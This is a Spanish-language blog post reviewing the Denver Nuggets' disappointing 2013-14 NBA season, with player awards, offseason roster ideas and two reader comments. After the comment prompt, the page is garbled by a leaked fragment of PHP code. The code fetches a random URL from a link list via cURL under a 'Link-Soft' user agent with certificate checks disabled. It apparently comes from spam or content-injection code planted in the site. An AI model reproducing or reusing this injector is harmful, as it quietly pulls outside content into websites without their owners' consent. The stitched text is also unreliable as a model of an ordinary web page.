Denver Nuggets: Insuficiente

07 de July de 2014 por Simon

No ha sido la mejor temporada para unos Nuggets que han visto como no han cumplido con las expectativas deportivas y como las lesiones se han cebado con ellos todo el año. La pérdida de potencial tras la marcha de Iguodala y George Karl ha sido aún más notoria de lo esperada. Pocos jugadores han cumplido con las expectativas. Por su parte, Brian Shaw no ha terminado de convencer a los muchos, me incluyo, que esperábamos con ansias ver como se movería como entrenador principal.

Denver ha ganado 21 partidos menos que la campaña anterior y ha pasado de ser el tercer equipo de la conferencia a quedarse en undécima posición muy lejos de los puestos de Play Off. Han continuado siendo de los equipos más anotadores de la liga pero sólo 2 equipos han recibido más puntos que ellos esta campaña. La temporada empezó con muchas dudas perdiendo 4 de los primeros 5 partidos de la campaña sin jugar prácticamente a nada, pero después llegó la reacción. En las tres siguientes semanas su balance fue de 10 victorias por sólo 2 derrotas. Parecía que una vez más iban a ser capaces de convertirse en un equipo de la zona noble a pesar de su falta de un jugador franquicia claro. Lamentablemente, diciembre les devolvió a la realidad y les distanció de esos puestos que ocupaban a finales del mes anterior. Además se confirmaba que McGee sería baja para toda la campaña, Ty Lawson justo empezaba a carburar y ya empezaban a sonar rumores de que Gallinari no regresaría esta temporada. El enfrentamiento público entre Andre Miller, un veterano con muchos galones en la plantilla, y el cuerpo técnico evidenciaba que el equipo no estaba pasando por su mejor momento ni dentro ni fuera de las canchas. Con los Nuggets prácticamente descartados para Play Off en enero, el resto de la campaña los Nuggets discurrió sin pena ni gloria, siempre anclados en tierra de nadie, lejos de los puestos de play off e igualmente lejos de los peores equipos de la liga. 

Si por algo se ha caracterizado la temporada de los Nuggets es por la irregularidad. Ningún jugador ha terminado de encontrar un ritmo constante y una manera de aportar todos los días salvo Ty Lawson, que ha firmado su mejor temporada como profesional. Con McGee lesionado toda la campaña (algo que no tiene que ser malo de por sí) la pareja interior la formaron JJ Hickson y Kenneth Faried, que han rendido a rachas y ha sido complicado verles encadenar más de dos partidos buenos. En cambio el recambio interior, el ruso Timofey Mozgov, ha rendido por encima de lo esperado aportando buenos minutos cada vez que ha tenido que jugar. Han completado el quinteto titular los cumplidores Randy Foye y Wilson Chandler  que no son el tipo de jugador al que se le puede pedir algo más. Por otro lado los proyectos de futuro Quincy Miller y Evan Fournier no han rendido conforme a lo esperado y ya no tendrán más oportunidades en Denver.

De todas maneras es justo recordar también que los Nuggets no han tenido la plantilla al completo en ningún momento. JaVale McGee, el que se supone que debía ser el mejor interior del equipo, sólo ha jugado 5 partidos; el llamado a ser sexto hombre del equipo, Nate Robinson,  apenas pudo jugar media campaña hasta que una rotura de ligamento cruzado anterior lo apartó del equipo.; su teórico  jugador franquicia, el italiano Danilo Gallinari, no ha disputado ni un encuentro esta campaña tampoco por la lesión de rodilla de la temporada anterior; y Ty Lawson se ha perdido 20 partidos esta campaña con problemas de tobillo y por una rotura de costillas. Demasiadas lesiones en varios jugadores clave de la plantilla como para ponerles el “muy deficiente” que en principio su balance nos pide.

PREMIOS

MVP: No hay duda, Ty Lawson (17.5p – 3.5r – 8.8a) ha sido el mejor jugador del equipo. Empezó la temporada con muchas dudas pero ha ido de menos a más y a pesar de los problemas físicos ha demostrado que puede ser un jugador importante en la liga.

Sorpresa:  A perro flaco todo son pulgas. Nadie ha rendido por encima de lo esperado esta campaña en Denver. Otro claro signo de que este año no han ido las cosas bien en Colorado.

Decepción: Se supone que estábamos ante la temporada de despegue pero con más protagonismo sus números han bajado. Suponíamos que el techo de Kenneth Faried no era excesivamente alto pero su nulo progreso desde que llegó a la liga nos plantea serias dudas para el futuro. Otra decepción a nivel de equipo ha sido el escaso rendimiento en su cancha, en otros tiempos inexpugnable. Apenas han superando el 50% de victorias.

Esfuerzo en vano: Otra vez hay que premiar a Ty Lawson. Muchos grandes partidos suyos esta campaña quedaron sin premio, así que por lo menos que se lleve este “premio” honorífico.

JUGANDO A GM

Ya se han confirmado varios movimientos para este verano:  Ha vuelto a Denver vía traspaso Arron Afflalo, uno de los mejores escoltas de la liga y a un precio aceptable.

En el Draft, han llegado Jusuf Nurkic y Gary Harris, un pívot de futuro con bastante potencial y un escolta preparado para aportar desde ya anotación y defensa aunque sin gran potencial.

Personalmente, estoy cansado de Gallinari, mucha calidad pero demasiado frágil. Hay un equipo que precisa de un alero que anote y lance de lejos  y el jugador del que buscan desprenderse encaja a la perfección en nuestro equipo. Hablamos de Josh Smith que llegaría exclusivamente para jugar de 4.

Ejercería la team option sobre Quincy Miller. Última oportunidad para demostrar su potencial.

No me gusta Faried y si consiguiéramos a Josh Smith sería prescindible. De todas formas vamos a darle el rol de suplente del equipo para que aporta intensidad y rebote y ver si así su cartel mejora y podemos sacar más tajada por él como especialista de banquillo. Un alero defensor y tirador debería ser el objetivo.

No sé cuanto pedirá Danny Granger pero no creo que sus aspiraciones económicas puedan ser muy altas. La mid-level por él podría merecer la pena gastarla.

Mi plantilla quedaría algo parecido a esto:

Lawson/Robinson
Afflalo/Foye/Harris
Chandler/Granger
Smith/Faried
Hickson/Mozgov/McGee/Nurkic ( No creo que sea parte de la plantilla la temporada que viene)

Comenta

2 comentarios a esta entrada

  1. jhc dice:
    #1

    El refuerzo de Afflalo es muy bueno, para mi robaron a mano armada a Orlando

      Citar

  2. rumbero dice:
    #2

    Como dices muchas lesiones de gente demasiado importante. Así que les doy el beneficio de la duda aunque la temporada de Shaw no me haya convencido nada. Y coincido con la “decepción” de Faried y pondría en el mismo saco a Hickson. No se si han quedado muy lejos de los guarismos defensivos de la dupla Love-Pekovic pero por ahí andarán. Con todo lo que conlleva McGee, creo que le han echado en falta

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>